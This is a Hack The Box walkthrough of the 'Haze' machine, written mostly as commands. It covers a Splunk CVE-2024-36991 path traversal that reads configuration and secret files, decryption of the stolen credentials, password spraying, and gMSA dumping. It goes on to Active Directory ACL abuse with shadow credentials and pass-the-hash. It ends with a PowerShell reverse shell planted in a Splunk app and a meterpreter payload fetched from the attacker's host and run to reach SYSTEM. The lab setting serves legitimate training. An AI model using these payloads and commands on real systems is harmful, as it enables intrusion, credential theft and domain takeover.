https://app.hackthebox.

com/machines/Haze

10.10.11.61

haze.htb dc01.haze.htb

Nmap Results
Splunk CVE-2024-36991
A Splunk Service is Running on http://haze.htb:8000

Whe found a Exploit CVE-2024-36991

 Clone the repro

git clone https://github.com/bigb0x/CVE-2024-36991.git

Start the Exploit

python3 CVE-2024-36991.py -u http://haze.htb:8000

Try to crack the Hashes

john --wordlist=/usr/share/wordlists/rockyou.txt hahses.txt

 The Hashes are not crackable ❌

Path Traversal Vulnerability

Whe look for the location from authentication.conf file
 Reading Splunk Configuration via Path Traversal Vulnerability

curl -s "http://haze.htb:8000/en-
US/modules/messaging/C:../C:../CC:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/system/local/au
thentication.conf"
Whe found an Username Paul Taylor and Passwort
Splunksecrets
 Cloning the Splunk Secrets Extraction Tool

git clone https://github.com/HurricaneLabs/splunksecrets.git

Important

These commands set up a Python virtual environment and install the splunksecrets tool. This isolated environment
ensures dependencies are managed cleanly. The tool is now ready to be used for decrypting sensitive data found in
Splunk’s configuration files , aiding in credential extraction and privilege escalation tasks.

Exfiltrating the Splunk Secret Key via Path Traversal

curl -s "http://haze.htb:8000/en-
US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/auth/splunk.secr
et"

Whe add the Splunk Secret Key in splunk.secret

echo
'NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0
dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6r
nN0xqB7cHbofaA1YV9vgD' > splunk.secret
 Setting Up and Installing the SplunkSecrets Python Environment

cd splunksecrets

python3 -m venv venv

source venv/bin/activate

pip3 install splunksecrets

Decrypting Splunk Credentials Using the Master Secret

splunksecrets splunk-decrypt -S splunk.secret

Then add the recovered password salt to proceed with decryption

Whe found the PW Ld@p_Auth_Sp1unk@2k24

User Enumeartion
Brute-Forcing SMB RID s to Enumerate Domain Users

nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep "SidTypeUser" | awk -F '\\\\' '{print
$2}' | awk '{print $1}' > users.txt

Validating WinRM Access for Enumerated Users

crackmapexec winrm 10.10.11.61 -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb

 Whe found that the PW works for User mark.adams

Exploit Chain
Info

Attack Summary: Shadow Credentials to SYSTEM Access via Kerberos and WinRM

The attack begins by using a valid domain user ( mark.adams ) to enumerate a gMSA ( Haze-IT-Backup$ ) and grant it rights to read its
own password. With the dumped gMSA hash, a TGT is requested using getTGT.py . Using this ticket, the attacker leverages
bloodyAD to:

1. Take ownership of the SUPPORT_SERVICES user object,

2. Grant GenericAll rights to it,
 3. Add Haze-IT-Backup$ as a group member, and
4. Inject shadow credentials into the user edward.martin .

Then, a forged certificate is created and converted into a .pfx file, which is used with certipy to authenticate as edward.martin .
Finally, a Pass-the-Hash attack via evil-winrm spawns a remote shell — completing a full domain privilege escalation chain via
Kerberos abuse, object ACL manipulation, and shadow credentials.

Establishing a WinRM Shell with Evil-WinRM

evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb

Identifying gMSA Access Control: Domain Admins Can Read the Secret

gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb

Modifying gMSA Permissions to Retrieve the Managed Password

Set-ADServiceAccount -Identity Haze-IT-Backup$ -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"

 Question

This PowerShell command uses Set-ADServiceAccount to modify the PrincipalsAllowedToRetrieveManagedPassword property of

the gMSA account Haze-IT-Backup$ , allowing the user mark.adams to retrieve its managed password.

If successful, this grants mark.adams access to decrypt the gMSA's password using tools like gMSADumper.py , which can then be
used for lateral movement or privilege escalation — especially if the gMSA is tied to a privileged service or system.

Dumping gMSA Password After Modifying Access Control

gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l haze.htb

Bloodhound

"We have WriteOwner Permessions so whe can change the ownership of the SUPPORT_SERVICES object to the user Haze-
IT\Backup$ ."
 Synchronizing Local Time with Domain Controller via ntpdate

ntpdate haze.htb

Requesting a TGT Using a gMSA Account Hash with getTGT.py

getTGT.py haze.htb/Haze-IT-Backup$ -hashes ':4de830d1d58c14e241aff55f82ecdba1'

Setting the Kerberos Ticket Environment for Authentication

export KRB5CCNAME=Haze-IT-Backup$.ccache

Taking Ownership of an AD Object via bloodyAD with Kerberos Authentication

bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u $'Haze-IT-Backup$' -k set owner "SUPPORT_SERVICES" $'Haze-IT-

Backup$'
 Granting GenericAll Rights on an AD Object via Kerberos with bloodyAD

bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k add genericAll

"CN=SUPPORT_SERVICES,CN=Users,DC=haze,DC=htb" 'Haze-IT-Backup$'

Adding gMSA to AD Group via Kerberos with bloodyAD

bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k add groupMember "SUPPORT_SERVICES" 'Haze-IT-

Backup$'

Injecting Shadow Credentials for Persistence via bloodyAD

bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -p ':4de830d1d58c14e241aff55f82ecdba1' add

shadowCredentials "edward.martin"
 Creating a PFX Certificate Bundle for Shadow Credentials and set a Password

openssl pkcs12 -export -out ikun.pfx -inkey Lyg8EEtA_priv.pem -in Lyg8EEtA_cert.pem

Note

🔁 Note: The filename ikun.pfx is arbitrary and can be renamed. Each time you generate a new key/certificate pair (e.g., with a
different CN or username), you may want to give the .pfx file a unique name to reflect the target user or purpose — for example:
edward.pfx , svc_backup.pfx , etc.

Authenticating as a Shadow Credentials Target Using Certipy and a PFX File

certipy-ad auth -pfx ikun.pfx -password 'pa$$w0rd' -u 'edward.martin' -domain haze.htb -dc-ip 10.10.11.61
 Gaining Remote Access via Evil-WinRM with NTLM Hash Authentication

evil-winrm -i 10.10.11.61 -u edward.martin -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af

User Flag 🏁
Grab the User Flag

type C:\Users\edward.martin\Desktop\user.txt

Privesc
Navigating to the Splunk Backups Directory on the Target System
cd C:\Backups\Splunk

Download the Backup File via evil-winrm

download 'splunk_backup_2024-08-06.zip'

Extracting a Splunk Backup Archive on our Machine

unzip splunk_backup_2024-08-06.zip

Whe found a splunk.secret File in the Backup Files

cat Splunk/etc/auth/splunk.secret

Whe put the Secret in splunk.secret2

**Whe found a Saltet PW in the `Backup Files

cat Splunk/var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
 Decrypting Splunk Secrets Using an Alternate Master Key

splunksecrets splunk-decrypt -S splunk.secret2

Whe found the PW Sp1unkadmin@2k24

Splunk Reverse Shell

We open http://haze.htb:8000
We Login as admin User and the found PW Sp1unkadmin@2k24
At this stage, we can proceed to upload a reverse shell through the Splunk interface
 Cloning a Reverse Shell Injection Tool for Splunk

git clone https://github.com/0xjpuff/reverse_shell_splunk

Note
 Go in the Folder reverse_shell_splunk/reverse_shell_splunk/bin and add you tun0 IP in run.ps1 and rev.py

Important

Whe need to change the revshell in run.ps1 the original revshell not work at haze.htb

run.ps1

$client = New-Object System.Net.Sockets.TCPClient('10.10.16.7', 4444)

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | % {0}

while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {

$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
$sendback = (iex $data 2>&1 | Out-String)
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte, 0, $sendbyte.Length)
 $stream.Flush()
}

$client.Close()

Packaging the Reverse Shell Splunk App into a TGZ Archive

tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk

Renaming the Payload Archive to a Splunk App Format

mv reverse_shell_splunk.tgz reverse_shell_splunk.spl

Then we become this File reverse_shell_splunk.spl

 This File we Upload to http://haze.htb:8000/

First of all we open a ncat listener to catch the revshell

nc -lvnp 4444

In the Splunk application we go to http://haze.htb:8000/en-US/manager/appinstall/_upload?

breadcrumbs=Settings%7C%2Fmanager%2Fsearch%2F%09Apps%7C%2Fmanager%2Fsearch%2Fapps%2Flocal
 Whe got a revshell at User alexander.green

Whe check rights

whoami /priv

Generating a Windows x64 Meterpreter Reverse Shel l with msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.7 LPORT=5555 -f exe -o shell.exe

 Starting a Meterpreter Listener in Metasploit for Reverse Shell Sessions

msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.16.7; set
LPORT 5555; run"

Hosting shell.exe with a Simple Python HTTP Server

python3 -m http.server 80

Downloading the Payload shell.exe to the Target via PowerShell

iwr http://10.10.16.7/shell.exe -OutFile C:\Users\Public\shell.exe

Navigating to the Windows Public Tasks Directory

cd C:\Users\Public\

Trigger the Meterpreter Shell

./shell.exe
Whe Upgrade the Meterpreter Shell to NT AUTHORITY\SYSTEM Rights

Question

Why SeImpersonatePrivilege Allows Elevation to SYSTEM via Meterpreter's getprivs

SeImpersonatePrivilege is a powerful Windows privilege that allows a process to impersonate the security context of another
user — often used in legitimate service operations. However, when misused by an attacker, it enables privilege escalation to
SYSTEM, even if you're not a local admin.

✅ Why It Succeeds
SeImpersonatePrivilege lets you "borrow" SYSTEM's identity if you can trick a SYSTEM process into talking to you.
You don’t need to be an administrator — just a user with this one privilege
 🚀 Common Exploit Technique: Token Impersonation via Named Pipes
Tools like Juicy Potato, Rogue Potato, or PrintSpoofer abuse SeImpersonatePrivilege by:
1. Triggering a service or COM object running as SYSTEM that connects back to a named pipe controlled by the attacker.
2. Once the SYSTEM process connects, the attacker impersonates its token.
3. The process (e.g., Meterpreter) now acts as SYSTEM.

Root Flagg 🏁💪
We open the root Flag

type C:\Users\Administrator\Desktop\root.txt